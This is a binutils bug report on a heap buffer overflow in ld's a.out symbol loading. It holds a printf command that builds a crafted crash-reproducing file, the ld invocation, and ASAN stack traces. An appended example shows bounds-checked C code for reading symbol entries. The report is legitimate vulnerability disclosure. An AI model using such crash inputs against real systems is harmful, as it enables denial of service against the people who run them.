https://sourceware.org/bugzilla/show_bug.cgi?id=20925
Bug ID: 20925
Summary: LD: Buffer Overflow when loading symbols (2)
Product: binutils
Version: 2.28 (HEAD)
Status: UNCONFIRMED
Severity: normal
Priority: P2
Component: ld
Assignee: unassigned at sourceware dot org
Reporter: boehme.marcel at gmail dot com
Target Milestone: ---

Dear all,

The following bug was found with AFLFast, a fork of AFL, in a 24 hour fuzzing session on Binutils. Thanks also to Van-Thuan Pham.

There is a heap-based buffer overflow in the linker that does *not* actually crash the linker for Binutils in trunk. The execution crashes for the preinstalled versions v2.26.1 and v2.24 of Binutils on Ubuntu 16.04 and 14.04, though, as well as printing an assertion failure. This bug might also be related to PR20909 and PR20924 but the overflow is located in a different function (bfd_getl32).

$ printf "\x08\x01\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00\x00\xef\x01\x72\x60\x00\x00\x00\x00\x10\x02\xf1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x23\x00\xee\xff\x00\x00\x00\x7f\x00\x02\x00\x00\x00\x64\x00\x00\x00\x44\xf3\x0a\x00\x06\x00\x00\x00\x01\x00\x00\x00\x7f\xf7\x27\x60\x00\x00\x00\x00\x14\x02\x5a\x00\x44\xe5\x0a\x00\x06\x00\x00\x00\x0b0\xff\xff0000\x05\x00\x00\x00\x00\xf1\x00\x18\x00\xf7\x23\x60\x00\x00\x00\x00\x18\x80\xff\x00\x44\xf1\x0a\x00\x02\x00\x00\x00\x18\x00\x5a\x00\x44\xe5\x0a\x00\x06\x00\x00\x00\x0b\x0a\xff\xff\xff\xff\x00\x00\x08\x00\x00\x00\x00\xf1\x00\x18\xe1\x5a" > test
$ ./ld test
..
ASAN says:

READ of size 1 at 0x60800000bf80 thread T0
    #0 0x517519 in bfd_getl32 ../../bfd/libbfd.c:548
    #1 0x76844d in aout_link_add_symbols ../../bfd/aoutx.h:3095
    #2 0x7698e8 in aout_link_add_object_symbols ../../bfd/aoutx.h:3227
    #3 0x76ac36 in aout_32_link_add_symbols ../../bfd/aoutx.h:3488
    #4 0x438d89 in load_symbols ../../ld/ldlang.c:2897
    #5 0x43c299 in open_input_bfds ../../ld/ldlang.c:3346
    #6 0x4568f7 in lang_process ../../ld/ldlang.c:6871
    #7 0x465d20 in main ../../ld/ldmain.c:428
    #8 0x7f2dcac40f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    #9 0x403968 (/home/ubuntu/subjects/binutils-gdb_fixed/obj-asan/ld/ld-new+0x403968)

0x60800000bf80 is located 0 bytes to the right of 96-byte region [0x60800000bf20,0x60800000bf80)
allocated by thread T0 here:
    #0 0x7f2dcbfc13a8 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc23a8)
    #1 0x516762 in bfd_malloc ../../bfd/libbfd.c:184
    #2 0x75945f in aout_get_external_symbols ../../bfd/aoutx.h:1323
    #3 0x7698c7 in aout_link_add_object_symbols ../../bfd/aoutx.h:3225
    #4 0x76ac36 in aout_32_link_add_symbols ../../bfd/aoutx.h:3488
    #5 0x438d89 in load_symbols ../../ld/ldlang.c:2897
    #6 0x43c299 in open_input_bfds ../../ld/ldlang.c:3346
    #7 0x4568f7 in lang_process ../../ld/ldlang.c:6871
    #8 0x465d20 in main ../../ld/ldmain.c:428
    #9 0x7f2dcac40f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../bfd/libbfd.c:548 in bfd_getl32

Best regards,
- Marcel
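Added example, not from the report and not binutils code: a bounds-checked reader for a.out external symbol entries, showing the length check that an unchecked bfd_getl32-style read of a symbol table lacks when the declared symbol count does not fit the allocated buffer. The 12-byte entry layout and the names getl32_checked and walk_aout_symbols are assumptions made for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumed layout (struct external_nlist of 32-bit a.out):
   e_strx[4] e_type e_other e_desc[2] e_value[4], little-endian. */
#define NLIST_SIZE 12

/* Same job as bfd_getl32, but refuses to read beyond buf + len.
   Written as off > len || len - off < 4 so the check cannot itself
   overflow.  Returns 1 on success, 0 if the read would go out of bounds. */
static int getl32_checked(const uint8_t *buf, size_t len, size_t off, uint32_t *out)
{
    if (off > len || len - off < 4)
        return 0;
    *out = (uint32_t)buf[off] | (uint32_t)buf[off + 1] << 8
         | (uint32_t)buf[off + 2] << 16 | (uint32_t)buf[off + 3] << 24;
    return 1;
}

/* Walks `count` declared symbols in a `len`-byte table and validates each
   string-table offset against `strsize`.  Returns the number of symbols
   accepted, or -1 when the declared count does not fit in the buffer,
   which is the situation in which an unchecked reader would run off the
   end of the allocation, as in the ASAN trace above. */
int walk_aout_symbols(const uint8_t *syms, size_t len, size_t count, uint32_t strsize)
{
    if (count > len / NLIST_SIZE)
        return -1;
    int accepted = 0;
    for (size_t i = 0; i < count; i++) {
        uint32_t strx, value;
        size_t base = i * NLIST_SIZE;
        if (!getl32_checked(syms, len, base, &strx) ||
            !getl32_checked(syms, len, base + 8, &value))
            return -1;
        if (strx >= strsize)   /* name would point outside the string table */
            continue;
        accepted++;
    }
    return accepted;
}

/* Constructed sample: two 12-byte entries; the second has an out-of-range
   string offset (0xffff) and is skipped rather than dereferenced. */
const uint8_t sample_table[24] = {
    0x04, 0, 0, 0,  0x0f, 0,  0, 0,  0x10, 0, 0, 0,
    0xff, 0xff, 0, 0,  0x0f, 0,  0, 0,  0x20, 0, 0, 0 };
```

Asking for three symbols from this 24-byte table is rejected up front instead of reading the 12 bytes past the end that the report's ASAN output describes.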